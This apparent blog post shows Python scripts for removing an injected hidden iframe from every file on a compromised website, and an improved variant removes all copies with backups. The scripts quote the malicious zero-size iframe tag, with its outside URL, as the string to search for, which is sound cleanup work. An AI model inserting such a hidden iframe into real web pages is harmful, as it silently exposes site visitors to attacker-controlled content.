Find exploit and remove it with python regular expressions
I had an exploit hit a site that wasn't on one of my servers and there wasn't a backup available to restore from. Still having to fix this, I decided to write a script to inspect all the files and remove the bad text. Mostly the exploit appended an iframe at the end of files, but I wrote my script to remove particular text no matter where it sat in the file.
I wrote a bit about a python file structure crawler and I'll include my whole method below for reference.
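    #!/usr/bin/env python3
    # By Josh White
    # This script will start at the current directory and remove the exploit text
    # from all of the files in all files and folders

    import os
    import re

    # re.escape() makes the dots in the URL match literally instead of any character
    myre = re.compile(re.escape(
        '<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" '
        'width="0" height="0" frameborder="0"></iframe>'))
    log = []
    arglist = []

    # Collect the path of every file below the current directory
    for dirname, dirnames, fnames in os.walk("./"):
        for name in fnames:
            arglist.append(os.path.join(dirname, name))

    for filename in arglist:
        print(filename)
        if os.path.isfile(filename):
            # latin-1 maps every byte to one character, so any file round-trips unchanged
            with open(filename, "r", encoding="latin-1", newline="") as fh:
                f = fh.read()
            m = myre.search(f)
            if m:
                print("Exploit found in " + filename)
                # Keep everything before and after the first match
                newfile = f[:m.start()] + f[m.end():]
                with open(filename, "w", encoding="latin-1", newline="") as fh:
                    fh.write(newfile)
                log.append(filename + " was repaired\n")

    # One line per repaired file
    with open("PYLOG.log", "w") as fh:
        fh.writelines(log)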
Basically I compile the bad text as a regular expression, then iterate through every file and search for a match. If a match is found I replace the bad file with the file minus the bad text. I know this will only find the first instance of the bad text and remove it, and if there were more instances in a single file they wouldn't be found. You could make the if myre.search into a recursive function, or just run the script multiple times!
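
A variant that removes every copy of the tag in one pass, added here as an example and not the author's script. It works on raw bytes, matches case-insensitively, defaults to a dry run, and keeps a copy of each infected file before rewriting it; the names `clean_bytes`, `clean_tree` and the `.infected.bak` suffix are assumptions made for this example.

```python
import os
import re
import shutil

# The injected tag quoted on this page, matched as bytes so binary files are safe.
BAD = (b'<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" '
       b'width="0" height="0" frameborder="0"></iframe>')
BAD_RE = re.compile(re.escape(BAD), re.IGNORECASE)


def clean_bytes(data):
    """Return (cleaned_data, number_of_copies_removed)."""
    return BAD_RE.subn(b"", data)


def clean_tree(root, dry_run=True, backup_suffix=".infected.bak"):
    """Walk root, strip every copy of the tag, return {path: copies_removed}."""
    report = {}
    for dirname, _dirs, fnames in os.walk(root):
        for name in fnames:
            path = os.path.join(dirname, name)
            # Skip our own backups, symlinks and anything that is not a regular file
            if (name.endswith(backup_suffix) or os.path.islink(path)
                    or not os.path.isfile(path)):
                continue
            with open(path, "rb") as fh:
                data = fh.read()
            cleaned, count = clean_bytes(data)
            if count == 0:
                continue
            report[path] = count
            if not dry_run:
                shutil.copy2(path, path + backup_suffix)  # keep the infected original
                tmp = path + ".tmp"
                with open(tmp, "wb") as fh:
                    fh.write(cleaned)
                shutil.copymode(path, tmp)  # preserve permissions
                os.replace(tmp, path)  # swap in the cleaned file atomically
    return report


if __name__ == "__main__":
    # Dry run: list what would change without touching any file
    for path, count in sorted(clean_tree(".", dry_run=True).items()):
        print("%s: %d injected iframe(s)" % (path, count))
```

The backups still contain the injected iframe, so move them out of the web root once the cleaned site has been checked.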